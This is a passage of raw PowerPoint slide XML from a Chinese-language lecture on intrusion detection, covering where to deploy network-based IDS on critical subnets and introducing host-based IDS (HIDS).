              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="69" name="图片 68">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDF39515-8491-1A09-1247-06EC65D2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0" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54D2D86E-B043-C0DB-540A-43CCC2D6BA5B}"/>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D9C1A2AF-E70E-04C1-C51C-263D02B609DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6133858" y="4176621"/>
            <a:ext cx="5310505" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="8363" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C6900E5-E484-26C4-B3FC-2708A8B3C76D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="7418" cy="589"/>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sz="1800" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>由于防火墙的过滤作用，入侵检测器并不能记录下所有可能的入侵行为</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="81" name="组合 80">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF54B071-77B0-8DD3-3CD7-E01AA6FCC9C1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="86" name="图片 85">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5A48C8C-8A03-9D80-1BB7-58A988233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1" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98097AFD-0CA0-15FB-4A66-4D8A0FF1F86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3" name="组合 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{189F01A4-2FCA-B8E0-3EB6-27CF6884224E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6493904" y="3221846"/>
            <a:ext cx="1118136" cy="734063"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0853D03-35E3-C76C-8934-016D7CE6F9B6}"/>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5" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DE53C67-D049-3EEC-D6DC-A3367515CB04}"/>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6" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EFAF329-ED3C-70FD-C4CF-B02B94FF84C3}"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="57" name="组合 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F689F74-9776-6784-C77F-E40593545AFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="940954" y="5317003"/>
            <a:ext cx="6630670" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10442" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3060BEE3-64F4-B36C-F01E-AA5C8E77C915}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="9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sz="1800" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>实现对内部网络信息的检测</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="60" name="组合 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCD7CE92-4861-7CEB-EF68-5DCE5BC0D3CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="61" name="图片 60">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CECEDD1-BF9C-60AE-172B-2114B3AA1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2" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C87A5152-AFBC-9E27-E080-6600BD23B65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2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE104FE-926D-4937-855F-0AB156FBAB13}"/>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2606716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D7A6DB2C-88FB-3808-A74A-B08CD060E3F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="4320000" cy="720000"/>
            <a:chOff x="3792538" y="3138472"/>
            <a:chExt cx="1213959" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="72" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{698EB868-5B1B-E8BB-EB34-4A5483C7B4D5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="3792538" y="3138472"/>
              <a:ext cx="1213959"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73" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E39EF1C4-9A3B-2A81-427E-0689AB2B3E06}"/>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74" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37684E28-920E-9778-4559-882227F6DF46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3860800" y="3293024"/>
              <a:ext cx="1031865" cy="47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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>NIDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的部署</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>——</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>关键子网</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2207808-5FF6-4273-3366-8A11B3D5DCC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1335040" y="2270855"/>
            <a:ext cx="9160598" cy="7239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dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>通过对关键子网进行安全检测，检测到来自内部以及外部的所有不正常的网络行为</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" sz="1200" b="1" dirty="0">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="43" name="组合 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03300A43-5B4B-7EDB-E412-BD8491048FFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1141451" y="3236042"/>
            <a:ext cx="1118136" cy="734063"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8C3F9F-D15D-B3FF-7497-B56DF20E5252}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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5" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4336BCAD-DB9B-7A0A-6353-69779EA9DA31}"/>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6" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCCE99AE-0EE9-6C81-801A-82A5AAC490E7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3860799" y="3293024"/>
              <a:ext cx="1109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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="47" name="组合 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FCD80AA-6A81-BDD0-C942-3AF530FCC56C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="955040" y="4082781"/>
            <a:ext cx="6880225" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10835" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{722D8E04-0C2D-B185-37DF-A1CC4A1C3C5A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="989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流量相对要小一些，可保证入侵检测器的有效检测</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="49" name="组合 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{356D418F-25B3-529A-BC97-55E46D276738}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="51" name="图片 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0FA0F67-2A33-5807-D596-C16BFDA8B9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2" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F19E9C24-0F5E-5D41-84D6-214FC84D23BC}"/>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66" name="组合 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4244D8F-C7B8-D079-EF04-10D184928E1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="955040" y="4719131"/>
            <a:ext cx="6880225" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10835" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17C818C2-CB7A-748B-4BFC-2852CD613FB7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="989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集中资源检测针对关键系统和资源的来自企业内外部的攻击</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="68" name="组合 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{659855B3-6FAB-6174-D26B-23DB4A41F162}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="69" name="图片 68">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDF39515-8491-1A09-1247-06EC65D2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0" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54D2D86E-B043-C0DB-540A-43CCC2D6BA5B}"/>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57" name="组合 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F689F74-9776-6784-C77F-E40593545AFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="940954" y="5317003"/>
            <a:ext cx="6630670" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10442" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3060BEE3-64F4-B36C-F01E-AA5C8E77C915}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="9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lang="zh-CN" altLang="en-US" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>将有限的资源进行有效部署，获取最高的使用价值</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="60" name="组合 59">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCD7CE92-4861-7CEB-EF68-5DCE5BC0D3CB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="61" name="图片 60">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CECEDD1-BF9C-60AE-172B-2114B3AA1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2" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C87A5152-AFBC-9E27-E080-6600BD23B65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2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFC9D23B-6416-4B70-A103-F840C33DB580}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3.1 NIDS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1709103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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="792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effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基于主机的入侵检测系统（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>HIDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="19050" dir="2700000" algn="tl" rotWithShape="0">
                    <a:schemeClr val="dk1">
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endPar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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1681480" y="3354070"/>
            <a:ext cx="3497731" cy="1753235"/>
            <a:chOff x="2372" y="4859"/>
            <a:chExt cx="5514" cy="2761"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="38" name="组合 37"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2385" y="5010"/>
              <a:ext cx="4949" cy="1508"/>
              <a:chOff x="8633" y="2713"/>
              <a:chExt cx="4949" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10016" y="3080"/>
                <a:ext cx="356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dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="002060"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>网络连接检测</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
